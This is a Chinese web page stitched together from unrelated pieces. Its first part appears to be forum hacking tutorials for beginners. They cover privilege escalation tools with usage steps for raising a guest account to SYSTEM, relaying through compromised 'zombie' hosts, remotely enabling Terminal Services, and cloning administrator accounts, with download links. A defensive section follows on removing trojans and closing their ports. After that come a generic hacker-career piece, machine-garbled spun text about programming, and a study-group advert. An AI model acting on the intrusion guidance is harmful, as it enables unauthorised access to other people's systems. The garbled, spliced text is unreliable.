  首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000001。

  3,禁止自动打开默认共享

  对于server版,找到如下主键 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] 把AutoShareServer(DWORD)的键值改为:00000000。

  对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。

  B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)

  net stop lanmanserver

  可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

  C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。

  D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:

  过配置本地策略来禁止139/445端口的连接:

  http://www.sixthroom.com/ailan/f... 2&RootID=284&ID=284

  菜鸟进阶(6)

  关于扫描出的漏洞

  简单说明:

  很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。如果你希望了解的多一些,最好经常到发布漏洞比较快的网站走一走,漏洞的利用是一个不段积累的过程。时间长了相信你就体会到了。

  漏洞搜索:

  绿盟的引擎http://www.nsfocus.net/index.phpact=sec_bug

  蓝盾的引擎http://www.landun.org/zhongyao/sousuo.htm

  补天网的引擎http://www.patching.net/otherweb/leak/leakindex.asp

  安全焦点的引擎http://www.xfocus.net/vuln/index.php

  小凤居的引擎http://lilitou1.myetang.com/

  相关帖子:

  一个CGI漏洞的发现和利用

  http://www.sixthroom.com/ailan/f... 2&RootID=285&ID=285

  cgi漏洞大全http://www.sixthroom.com/ailan/f... 2&RootID=293&ID=293

  常见CGI漏洞及应对二http://www.sixthroom.com/ailan/f... 2&RootID=286&ID=286

  常见CGI漏洞及应对一http://www.sixthroom.com/ailan/f... 2&RootID=287&ID=287

  Windows 2000漏洞集锦1http://www.sixthroom.com/ailan/f... 2&RootID=288&ID=288

  Windows 2000漏洞集锦2http://www.sixthroom.com/ailan/f... 2&RootID=289&ID=289

  Windows 2000漏洞集锦3

  http://www.sixthroom.com/ailan/f... 2&RootID=290&ID=290

  Windows 2000漏洞集锦4

  http://www.sixthroom.com/ailan/f... 2&RootID=291&ID=291

  Windows 2000漏洞集锦5

  http://www.sixthroom.com/ailan/f... 2&RootID=292&ID=292

  ASP漏洞大全http://www.sixthroom.com/ailan/f... 2&RootID=294&ID=294

  IIS漏洞整理一http://www.sixthroom.com/ailan/f... 2&RootID=295&ID=295

  IIS漏洞整理二http://www.sixthroom.com/ailan/f... 2&RootID=296&ID=296

  中国网络安全响应中心各种漏洞大全http://www.cns911.com/holes/linux/list.php

  第8章------关于提升权限

  简单说明:

  黑客的最终目标就是得到root(即win中的admin)权限。一个真正的黑客会把一次入侵当做是自己的一件作品,不会轻易放弃,但是有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。还要补充一点,就是在拿到一个现成的后门软件,或是一个木马的时候,一定要先看看说明。至少你应该知道这个后门运行后的效果吧?更有些人上传了某个后门软件或是木马到目标后就认为完事了,你不执行它就是传个地雷上去又有什么用呢?

  相关工具:

  erunasx 利用Debug Registers漏洞提升权限http://www.qq888.com/down/download.aspDid=796

  Windows NT/2000权限提升工具,可以将任意用户提升到SYSTEM级别的权限。漏洞出在smss.exe中的DEBUG子系统,所有普通用户都可以通过该漏洞获得对系统中任意进程或线程句柄的控制,从而可以以SYSTEM或管理员权限执行任意命令。2、使用方法:假设我们已经获得一台机器上的一个GUEST 用户(或其他普通用户),现在我们要这个工具来获得系统最高权限。进行如下步骤:把ERunAsX.exe和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下,例如C:下。以GUEST身份运行"ERunAsX 要执行命令",例如"ERunAsX cmd.exe",这时执行的命令是以SYSTEM 权限运行的...(请注意:具体使用以软件内英文说明为准,内附该BUG解决办法)

  PipeUpAdmin 对sp1及更低有效http://maopao.com/down/download.aspDid=69

  ISPC 利用IIS的漏洞,详见自带说明http://www.cnsq.net/sq88/down/show.aspid=572&down=1

  PHPBB论坛权限提升http://www.newyouth.org/softdown... .0.exploit_code.zip

  WIN帮助文件溢出(可用于XP)http://www.newyouth.org/softdown... ack/chmoverflow.zip

  NT/2K权限提升工具GetAdmin下载http://www.csdn.net/cnshare/soft/openfile.aspkind=1&id=9807

  相关帖子:

  NT/2000提升权限的方法小结http://www.sixthroom.com/ailan/f... 2&RootID=297&ID=297

  关于WIN2000的入侵,以及安全防御等问题(文章包含一次利用U漏洞提高权限的过程)

  http://www.sixthroom.com/ailan/f... 2&RootID=298&ID=298

  UNICODE漏洞介绍及入侵

  http://www.sixthroom.com/ailan/f... 2&RootID=299&ID=299

  怎样提升权限,做后门

  http://www.sixthroom.com/ailan/f... 2&RootID=300&ID=300

  一般用户获取NT服务器Admin权限的方法

  http://www.sixthroom.com/ailan/f... 2&RootID=302&ID=302

  Windows NT4的安全结构(对新手有些难,了解一下吧)http://www.sixthroom.com/ailan/f... 3&RootID=303&ID=303

  菜鸟进阶(7)

  关于做代理和跳板

  简单介绍:

  代理服务器英文全称是Proxy Cerver,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。在一般情况下,我们使用网络浏览器直接去连接其他 Internet站点取得网络信息时,须送出Request信号来得到回答,然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且,大部分代理服务器都具有缓冲的功能,就好象一个大的Cache,它有很大的存储空间,它不断将新取得数据储存到它本机的存储器上,如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的,那么它就不重新从Web服务器取数据,而直接将存储器上的数据传送给用户的浏览器,这样就能显著提高浏览速度和效率。更重要的是:Proxy Server (代理服务器)是 Internet链路级网关所提供的一种重要的安全功能,它的工作主要在开放系统互联 (OSI) 模型的对话层,有了对代理的了解,相信你也认识到了什么是跳板。

  相关工具:

  SocksCap 2.2 SOCKS调度工具http://www.123gz.com/dzc/download/sc32r231.exe

  SkSockServer1.04 代理跳板http://www.123gz.com/dzc/download/sksockserver.zip

  Snake跳板傻瓜版http://www.123gz.com/dzc/download/sgtb.zip

  代理猎手V3.1Beta1简装版http://www.123gz.com/dzc/download/proxyhunter.zip

  FTP Serv-U 4.0 正式汉化版,最常用的ftp服务程序http://61.159.224.188/makesoftur... 627E207574756375737

  slimftp 隐蔽的ftp服务器http://www.whitsoftdev.com/files/slimftpd.zip

  天雁WEB服务器 不用安装的小型web服务程序http://www.cnzzz.com/download/do... 33352254709&Url=100

  多种服务程序下载

  http://www.zdnet.com.cn/download/windows/b...r,00.htmsort=5

  相关帖子:

  代理、肉鸡、跳板的概念http://www.sixthroom.com/ailan/f... 2&RootID=305&ID=305

  代理服务器(Proxy)完全解析http://www.sixthroom.com/ailan/f... 2&RootID=307&ID=307

  如何使用代理服务器http://www.sixthroom.com/ailan/f... 2&RootID=309&ID=309

  简单制作跳板http://www.123gz.com/dzc/sksockserver-cusky.htm

  Serv-U设置教程http://www.enanshan.com/ftp/

  SocksCap32 使用详解http://www.123gz.com/dzc/sockscap32.htm

  在肉鸡上安装FTP服务器http://www.sixthroom.com/ailan/f... 2&RootID=306&ID=306

  利用 unicode 漏洞,轻松建立自己的代理服务器

  http://www.123gz.com/dzc/sksockserver-nicky-1.htm#top1

  特别推荐猎手与蚂蚁收藏馆http://www.123gz.com/(绝对值得一看)

  菜鸟进阶(8)

  关于终端服务(3389)

  简单说明:

  windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。有一点需要强调一下使用客户端登陆远程主机对当前工作的用户没有影响,而且一切动作本地用户都是看不到的。也就是说远程登陆和本地用户是在不相同的空间,两者互不干扰。

  相关工具:

  WIN2000客户端

  http://zudu2000.myetang.com/soft/win2k.rar

  winxp下的客户端 功能比2000下的更强大

  http://zudu2000.myetang.com/soft/windowsXP.zip

  终端服务程序的一个补丁 使本地和远程间能复制文本http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe

  web版终端客户端 使用浏览器调用ActiveX控件访问终端服务

  http://www.enanshan.com/down/tswebsetup.exe

  C3389.EXE 修改终端服务端口号的工具

  http://www.sandflee.net/down/show.aspid=228&down=1

  Win2k终端服务器端所需文件包

  http://www.netsill.com/download/download.aspDid=1965

  3389自动安装程序-djshao正式版5.0

  http://netsill.com/download/download.aspDid=2019

  开启3389工具(如果要想让远程主机开启WIN2000的终端服务,请把3389.exe也传到远程主机上并运行。然后等待一个漫长的时间(由于是无人执守安装)。就可以看到远程主机的3389端口会被打开。)

  http://netsill.com/download/download.aspDid=1991

  W2K终端服务客户端安装版

  http://www.sandflee.net/down/show.aspid=39&down=1

  关于远程启动终端服务的帖子http://www.sixthroom.com/ailan/f... 2&RootID=385&ID=385

  终端服务问题常见问答

  http://www.sixthroom.com/ailan/f... 2&RootID=386&ID=386

  图文讲解输入法漏洞入侵

  http://www.sandflee.net/txt/list.aspid=22

  3389自动安装工具教程

  http://netsill.com/download/download.aspDid=2068

  3389动画教程(密码china)

  http://netsill.com/download/download.aspDid=1990

  修改终端客户端端口动画教程

  http://netsill.com/download/download.aspDid=2009

  3389资料http://www21.brinkster.com/srob/wawa/wawa/3389txt.htm

  菜鸟进阶(9)

  关于克隆帐号

  简单说明:

  克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAMDomainsAccountUsers下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。(前辈就是前辈把大家想到的都写出来了,我实在不知道这里在加些什么了。看来也只有这样了。大家如果还有什么不明白的就到论坛里发贴子吧。

  具体的看这里:

  解剖安全帐号管理器(SAM)结构http://www.sixthroom.com/ailan/f... 3&RootID=387&ID=387

  明白原理后就可以手动或者用现成的工具克隆帐号了。

  相关工具:

  克隆ca.exehttp://www.netxeyes.org/CA.exe

  检查克隆cca.exehttp://www.netxeyes.org/CCA.exe

  手动克隆需要SYSTEM权限,用它 psu.exe

  http://www.sandflee.net/down/show.aspid=176&down=1

  相关帖子:

  工具克隆:ca和cca 请访问作者主页http://www.netxeyes.org/main.html

  psu用法:psu.exe提升为system权限http://www.sixthroom.com/ailan/f... 2&RootID=390&ID=390

  手动克隆:如何克隆管理员帐号http://www.sixthroom.com/ailan/f... 3&RootID=388&ID=388

  如何克隆管理员帐号的补充http://www.sixthroom.com/ailan/f... 3&RootID=389&ID=389

  木马防范及一些端口的关闭

  一、防范木马应该注意的一些问题

  1、不到不受信任的网站上下载软件运行

  2、不随便点击来历不明邮件所带的附件

  3、及时安装相应的系统补丁程序

  4、为系统选用合适的正版杀毒软件,并及时升级相关的病毒库

  5、为系统所有的用户设置合理的用户口令

  口令设置要求:

  1.口令应该不少于8个字符;

  2.不包含字典里的单词、不包括姓氏的汉语拼音;

  3.同时包含多种类型的字符,比如

  o大写字母(A,B,C,..Z)

  o小写字母(a,b,c..z)

  o数字(0,1,2,…9)

  o标点符号(@,#,!,$,%,& …)

  win2000口令设置方法:

  当前用户口令:在桌面环境下按crtl+alt+del键后弹出选项单,选择其中的更改密码项后按要求输入你的密码(注意:如果以前administrator没有设置密码的话,旧密码那项就不用输入,只需直接输入新的密码)。

  其他用户口令:

  在开始->控制面板->用户和密码->选定一个用户名->点击设置密码

  二、检查和清除木马可能会使用到命令

  1、如何进入命令行方式?

  win98下在开始-->运行中输入command点确定

  winnt、win2000、winxp下在开始-->运行中输入cmd后点确定

  2、如何使用netstat命令?

  netstat是用来显示网络连接、路由表和网络接口信息的命令,使用方法是在命令行下输入netstat -an后回车,输出结果格式如下:

  Active Connections

  Proto Local Address Foreign Address State

  TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

  TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

  TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING

  TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING

  UDP 0.0.0.0:445 *:*

  UDP 0.0.0.0:2967 *:*

  UDP 0.0.0.0:38037 *:*

  这其中Proto项代表是协议类型,Local Address项代表的是本地IP地址和端口(冒号后面为端口号),Foreign Address项代表的是外部IP地址和端口,State表示的是当前状态。上面这个结果表示这台机器开放了TCP的135、445、1025和1026 端口,UDP的445、2967和38027端口

  3、如何使用Fport命令?

  Fport是查看系统进程与端口关联的命令,使用方法是在命令行方式下输入Fport后回车,输出结果格式如下:

  Pid Process Port Proto Path

  472 svchost -> 135 TCP C:\WINNT\system32\svchost.exe

  8 System -> 445 TCP

  580 MSTask -> 1025 TCP C:\WINNT\system32\MSTask.exe

  8 System -> 1026 TCP

  8 System -> 445 UDP

  444 rtvscan -> 2967 UDP C:\Program Files\NavNT\rtvscan.exe

  812 MsgSys -> 38037 UDP C:\WINNT\System32\MsgSys.EXE

  这其中port下面代表的是系统当前开放的端口而path下面列出的是与该端口关联的程序及其所在位置。

  从上面这个结果看,系统上135、445端口是与C:\winnt\system32\svchost.exe程序关联的1025、1026、445 (udp)端口与        c:\winnt\system32\mstask.exe程序关联的2967(udp)端口是与C:\Program Files\NavNT\rtvscan.exe程序关联的38027(udp)端口是与  C:\WINNT\System32\MsgSys.EXE 程序关联的

  注:fport仅适用于winnt、win2000和winxp,在win98下无法使用

  4、如何编辑注册表?

  请在开始--〉运行中输入regedit后点确定进入注册表编辑状态。注册表编辑框左边显示的是注册表的项,右边显示的是注册的键值,要删除键值请点中该键值后点右键选择其中的删除。要修改键值请点中该键值后点鼠标右键选择修改。要删除项请选中该项后点右键选删除。

  5、如何关闭服务?

  开始-->控制面版-->管理工具-->服务进入服务管理工具,选中要关闭的服务后点右键选停止

  注:上面方法仅适用于WINNT、WIN2000和WINXP

  6、如何进入安全模式?

  系统启动时按F8

  7、如何杀进程?

  win98下按ALT+CTRL+DEL,在弹出的对话框中选中你要结束的进程后点关闭,winnt、win2000和winxp下按ALT+CTRL+DEL弹出窗口后选择任务管理器,在进程一项里选中你要结束的进程后点击结束进程

  三、常见木马及控制软件的服务端口与关闭方法

  注意:下文中提到的相关路径根据您的操作系统版本不同会有所不同,请根据自己的系统做相应的调整

  win98系统: c:\windows c:\windows\system

  winnt和win2000系统: c:\winnt c:\winnt\system32

  winxp系统: c:\windows c:\windows\system32

  根据系统安装的路径不同,目录所在盘符也可能不同,如系统安装在D盘,请将C:\windows改为D:\windows依此类推大部分的木马程序都可以改变默认的服务端口,我们应该根据具体的情况采取相应的措施,一个完整的检查和删除过程如下例所示:

  例:113端口木马的清除(仅适用于windows系统):

  这是一个基于irc聊天室控制的木马程序。

  1.首先使用netstat -an命令确定自己的系统上是否开放了113端口

  2.使用fport命令察看出是哪个程序在监听113端口

  例如我们用fport看到如下结果:

  Pid Process Port Proto Path

  392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe

  我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为

  c:\winnt\system32下。

  3.确定了木马程序名(就是监听113端口的程序)后,在任务管理器中查找到该进程,并使用管理器结束该进程。

  4.在开始-运行中键入regedit运行注册表管理程序,在注册表里查找刚才找到那个程序,并将相关的键值全部删掉。

  5.到木马程序所在的目录下删除该木马程序。(通常木马还会包括其他一些程序,如,rscan.exe、psexec.exe、 ipcpass.dic、ipcscan.txt等,根据木马程序不同,文件也有所不同,你可以通过察看程序的生成和修改的时间来确定与监听113端口的木马程序有关的其他程序)

  6.重新启动机器。

  以下列出的端口仅为相关木马程序默认情况下开放的端口,请根据具体情况采取相应的操作:

  707端口的关闭:

  这个端口开放表示你可能感染了nachi蠕虫病毒,该蠕虫的清除方法如下:

  停止服务名为WINS Client和Network Connections Sharing的两项服务

  删除c:\winnt\SYSTEM32\WINS\目录下的DLLHOST.EXE和SVCHOST.EXE文件

  编辑注册表,删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services项中名为RpcTftpd和RpcPatch的两个键值

  1999端口的关闭:

  这个端口是木马程序BackDoor的默认服务端口,该木马清除方法如下:

  使用进程管理工具将notpa.exe进程结束

  删除c:\windows\目录下的notpa.exe程序

  编辑注册表,删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项中包含c:\windows

  otpa.exe /o=yes的键值

  2001端口的关闭:

  这个端口是木马程序黑洞2001的默认服务端口,该木马清除方法如下:

  首先使用进程管理软件将进程windows.exe杀掉

  删除c:\winnt\system32目录下的windows.exe和S_Server.exe文件

  编辑注册表,删除将HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\项中名为windows的键值

  将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINE\Software\CLASSES项中的Winvxd项删除

  修改HKEY_CLASSES_ROOT xtfile\shell\open\command项中的c:\winnt\system32\S_SERVER.EXE %1为C:\WINNT\NOTEPAD.EXE %1

  修改HKEY_LOCAL_MACHINE\Software\CLASSES xtfile\shell\open\command项中的c:\ winnt\system32\S_SERVER.EXE %1键值改为C:\WINNT\NOTEPAD.EXE %1

  2023端口的关闭:

  这个端口是木马程序Ripper的默认服务端口,该木马清除方法如下:

  使用进程管理工具结束sysrunt.exe进程

  删除c:\windows目录下的sysrunt.exe程序文件

  编辑system.ini文件,将shell=explorer.exe sysrunt.exe 改为shell=explorer.exe后保存

  重新启动系统

  2583端口的关闭:

  这个端口是木马程序Wincrash v2的默认服务端口,该木马清除方法如下:

  编辑注册表,删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\项中的WinManager="c:\windows\server.exe"键值

  编辑win.ini文件,将run=c:\windows\server.exe改为run=后保存退出

  重新启动系统后删除C:\windows\system\ SERVER.EXE

  3389端口的关闭:

  首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。

  win2000关闭的方法:win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项,

  选中属性选项将启动类型改成手动,并停止该服务。

  win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。

  winxp关闭的方法:在我的电脑上点右键选属性-->远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。

  4444端口的关闭:

  如果发现你的机器开放这个端口,可能表示你感染了msblast蠕虫,清除该蠕虫的方法如下:

  使用进程管理工具结束msblast.exe的进程

  编辑注册表,删除HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项中的"windows auto update"="msblast.exe"键值

  删除c:\winnt\system32目录下的msblast.exe文件

  4899端口的关闭:

  首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服务是否是你自己开放并且是必需的。如果不是请关闭它。

  关闭4899端口:

  请在开始-->运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统安装目录),输入r_server.exe /stop后按回车。然后在输入r_server /uninstall /silence 到C:\winnt\system32(系统目录)下删除r_server.exe admdll.dll raddrv.dll三个文件

  5800,5900端口:

  首先说明5800,5900端口是远程控制软件VNC的默认服务端口,但是VNC在修改过后会被用在某些蠕虫中。

  请先确认VNC是否是你自己开放并且是必须的,如果不是请关闭

  关闭的方法:

  首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:\winnt\fonts\explorer.exe)

  在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新运行c:\winnt\explorer.exe)

  删除C:\winnt\fonts\中的explorer.exe程序。

  删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项中的Explorer键值。

  重新启动机器。

  首先我们需要弄清楚什么是黑客,黑客是对技术人员的一种肯定,是个褒义词,体现了他们高超的技术和超越极限的能力。黑客精神并不是仅仅局限在软件与互联网这个行业中。在其他领域拥有较高成就和作出杰出贡献的人都可以称为黑客。大家常说的黑客,在真正的黑客眼中应该叫做骇客。他们利用技术手段来攻击别人,获取信息,满足自己的精神需求或物质需求。

  黑客入门指南,小白如何成长为一名黑客黑客入门指南,小白如何成长为一名黑客

  1、编程

  编程是最基础的技能,新手学习建议从Python开始。好多小白总感觉学编程得从C语言开始,其实没必要,语言只是工具,编程最核心的还是编程思想,要学会用计算机的思维去思考问题。在宋丹丹的小品中,有这么一个笑话,把大象装冰箱里需要几步。如果是真的开发一个程序去把大象装冰箱里,还真就得一步步都要考虑到,而且每一步操作,可能出现的异常都要充分考虑清楚,尽可能在程序中把可能出现的所有异常都要做出处理。语言都是一通百通,所以找一个相对容易入门的语言开始学就可以,不必纠结到底什么语言好。

  黑客入门指南,小白如何成长为一名黑客

  2、熟练掌握常用的操作系统

  Windows系统作为使用人数最多的操作系统,这个是必须要掌握的。其次就是Linux系统, 选择一个合适的发行版,开始学习就可以,例如:Ubuntu,CentOS。

  黑客入门指南,小白如何成长为一名黑客

  3、学会网络建站所需的知识

  网站的重要性就不需要多说了,要想成为一名黑客,不懂网站怎么可以。http、www、html、css、JavaScript等建站所需的技术都要会,这算是基本功。

  黑客入门指南,小白如何成长为一名黑客

  4、必要的英语能力

  这项不是必须,但是却很重要,因为很多的资料都是英文版的,英语好,可以在第一时间获取更多有价值的信息。

  最后总结一下,要是成为心目的黑客大神,必须要会的内容还有很多,这里罗列的也就是基本功。除此之外,还要有较强的自学能力,有点问题就要问别人,自己不想办法解决,是不会走太远的。

  C语言是面向过程的,而C++是面向对象的

  C和C++的区别:

  C是一个结构化语言,它的重点在于算法和数据结构。C程序的设计首要考虑的是如何通过一个过程,对输入(或环境条件)进行运算处理得到输出(或实现过程(事务)控制)。

  C++,首要考虑的是如何构造一个对象模型,让这个模型能够契合与之对应的问题域,这样就可以通过获取对象的状态信息得到输出或实现过程(事务)控制。 所以C与C++的最大区别在于它们的用于解决问题的思想方法不一样。之所以说C++比C更先进,是因为“ 设计这个概念已经被融入到C++之中 ”。

  C与C++的最大区别:在于它们的用于解决问题的思想方法不一样。之所以说C++比C更先进,是因为“ 设计这个概念已经被融入到C++之中 ”,而就语言本身而言,在C中更多的是算法的概念。那么是不是C就不重要了,错!算法是程序设计的基础,好的设计如果没有好的算法,一样不行。而且,“C加上好的设计”也能写出非常好的东西。

  一、入门说话与体系编程

  第一台通用的可编程计较机(ENIAC 1946年),美国军方扶助、宾夕法尼亚大学电气工程学院研发。编程首要仍是经由过程电子开关和电缆线来完成,输入依靠卡片阅读器而输出依靠卡片穿孔机。帮手世界第一颗氢弹的研发。

  1、计较机说话

  指人与计较机之间通信的说话。

  2、计较机说话分类

  总体可分成机械说话,汇编说话,高级说话三大类。

  低级说话:

  机械说话,汇编说话,符号说话。

  汇编说话源轨范必需经由汇编,生成方针文件,然后实行。

  专用说话:

  DBMS(数据库办理体系)的数据库查询说话,CAD体系中绘图说话。

  机械说话:

  指一台计较机全数的指令集结。电子计较机所使用的由“0”和“1”构成二进制数。

  高级说话:

  BASIC,C,C++,PASCAL,FORTRAN,智能化说话(LISP,PROLOG等),动态说话(PHP,Lua,Python等)。

  C说话嵌入局部汇编说话实例:

  二、高端搜集通信开发

  使用套接字来到达历程间通信目的的编程。Windows把持体系供给给轨范员搜集编程套接字是winsock。搜集编程从大的团体来讲就是对信息的发送到领受,中心传输为物理线路等,软件编程人员不必要考虑。

  搜集模子:

  描述搜集的构造事理和工作事理

  OSI参数模子:七层

  Internet搜集模子:四层

  搜集和谈:指定层上停止数据交流的轨则。

  Internet搜集层和谈:IP和谈;DNS和谈。

  Internet传输层和谈:TCP和谈;UDP和谈。

  套接字(Sockets):应用轨范和搜集和谈的接口。

  TCP Sockets:使用TCP和谈实现靠得住的搜集传输。

  UDP Sockets:使用UDP和谈实现服从高的搜集传输。

  数据包:

  搜集通信编程概念,偶尔也称为组装包。指在应用层数据或报文按照必定事先划定好的轨则合的数据集结,实际把持网罗组包(打包),数据包传送,解包等。

  组包(打包):指按照和谈把零星的数据或报文按照组合起来,实际应用中,比如C++编程中,往往定一种新的数据类型用来存储数据包的构造。数据包传送,指数据包在电气物理传输。

  关于怎么快速学C/C++游戏编程,有什么方法,这个问题,想必大家都已经心中有数了,打算深入了解这个行业的朋友,可以加下小编的C/C++游戏编程学习群:745+059+451,邀请码(简述)不管你是小白还是大牛,小编我都欢迎,不定期分享干货,包括小编自己整理的一份2018最新的C/C++资料和0基础入门教程,欢迎初学和进阶中的小伙伴。

  每天晚上20:00我都会开直播给大家分享C/C++游戏编程学习知识和路线方法,群里会不定期更新最新的教程和学习方法(进群送2018C/C++游戏编程学习教程),大家都是学习C/C++的,或是转行,或是大学生,还有工作中想提升自己能力的前端党,如果你是正在学习C/C++的小伙伴可以加入学习。最后祝所有程序员都能够走上人生巅峰,让代码将梦想照进现实,非常适合新手学习,有不懂的问题可以随时问我,工作不忙的时候希望可以给大家解惑。

  解包:指领受端对数据停止解析,获得有效信息和数据。数据包经常套接字来传送和领受的。

  使用C++脱手开发把持体系:ping轨范:

  运转了局:

  1、办事器开发 2、假造实际 3、数字图像措置

  4、游戏开发 5、搜集软件 6、分布式应用

  7、把持体系 8、嵌入式体系(低端嵌入式:汇编和C。中端嵌入式:C和C++) 等等规模。

  三、红客与黑客生长到大神1、黑客:

  擅长IT手艺,相称计较机科学家。

  台湾:骇客Hacker;大陆和港奥:黑客。

  在中国内:骇客(恶意破解商业软件 恶意入侵别人网站等事务)

  付出结算、证券生意、期货生意等搜集金融办事账号、口令、密码比及达10组以上。3年以下有期徒刑,获取到达50组以上,3年以上7年以下有期徒刑。

  2、红客:

  维护国家好处,不能把持本身高尚高贵牛逼手艺入侵本身国家电脑,维护公理。

  道,可道,很是道,名,可名,很是名。是老子《道德经》

  给大师分享工作经历:

  1、学历代表曩昔,才能代默示在,进修力代表将来。——《重要的事理明白太晚可能会遗憾终生》。

  2、总结与反思习惯;理论与实战并重,表里双修;心态开放,视野坦荡;

  3、书籍是人类前进的阶梯

  

  这些是C/C++能做的

  服务器开发工程师、人工智能、云计算工程师、信息安全(黑客反黑客)、大数据 、数据平台、嵌入式工程师、流媒体服务器、数据控解、图像处理、音频视频开发工程师、游戏服务器、分布式系统、游戏辅助等

标签: 渗透测试

发表评论 (已有条评论)

  • 评论列表